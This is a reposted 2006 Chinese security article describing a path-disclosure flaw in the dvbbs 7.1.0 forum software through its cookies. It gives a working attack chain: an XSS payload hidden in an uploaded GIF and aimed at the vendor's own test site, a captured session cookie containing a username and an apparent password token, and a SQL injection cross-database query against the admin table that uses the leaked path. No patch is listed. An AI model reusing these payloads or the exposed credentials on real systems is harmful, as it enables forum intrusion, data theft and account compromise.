dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

王朝asp·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复!

dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。

漏洞利用例子:

一、泄露绝对漏洞测试:

对官方的测试站点:bbs.dvbbs.net

上传一张图,代码如下:

gif89a

[code]<script>

alert(document.cookie)

</script>[/code]

抓包得到cookie如下

cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs=

分析cookie可以得到站点的绝对路径如下:

d:\\web\\dvbbs7为论谈的绝对路径

二、攻击延伸:

www.host.com

主程序存在sql注入漏洞,但是找不到表名和字段名。

注入点假设:

www.host.com\linzi.asp?****=you

论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理.

利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp

实现跨库查询如下:

www.host.com\linzi.asp?****=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")

官方补丁:

尚无

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有  導航